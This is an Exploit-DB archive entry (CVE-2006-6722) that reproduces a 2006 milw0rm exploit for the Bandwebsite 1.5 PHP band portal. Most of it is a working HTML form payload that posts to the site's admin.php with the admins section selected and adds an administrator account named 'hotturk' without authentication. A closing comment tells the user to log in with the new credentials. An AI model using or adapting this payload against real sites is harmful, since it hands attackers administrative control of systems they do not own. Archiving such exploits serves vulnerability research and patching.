Bandwebsite <= 1.5 Login Remote Add Admin Exploit

2006-12-16T00:00:00
ID EDB-ID:2938
Type exploitdb
Reporter H0tTurk-
Modified 2006-12-16T00:00:00

Description

Bandwebsite <= 1.5 (Login) Remote Add Admin Exploit. CVE-2006-6722. Webapps exploit for php platform

                                        
                                            &lt;!--
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php 
- Author  : H0tTurk-

WebSiteVersion:1.x 
 - Problem : Admin Added Access.

Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more.
--&gt;

      &lt;TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0&gt;
        &lt;TBODY&gt;
        &lt;tr&gt;&lt;td bgcolor=#ffffff&gt;
&nbsp;&lt;/p&gt;
&lt;p&gt;
&lt;form action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins method=post&gt;
   Name:&lt;br&gt;
&lt;input type=text name='name' value='hotturk' size="20"&gt;&lt;br&gt;
   Pass:&lt;br&gt;
&lt;input type=text name='pass' value='hotturk' size="20"&gt;&lt;br&gt;
&lt;input type=submit name='submit' value='send'&gt;&lt;br&gt;
&lt;/form&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
&lt;P&gt;&lt;BR&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/BODY&gt;

&lt;!--
Admin Added :)
http://[target]/bandwebsite/login.php
and login as admin 
name :hotturk
pass : hotturk

--------------------------------------------------------
Special Thx: Dr.Max.Virus,GencTurk,Str0ke,SawTurk,Chironex Fleckeri,Unique-key,KurtEfendy,MadConfig,R4zor,Arabian-FighterZ,And Ayyildiz ViP Soldiers 
                                       "BUNDAN OTESÝ YA ÝSTÝKLAL YA OLUM"
--&gt;

# milw0rm.com [2006-12-16]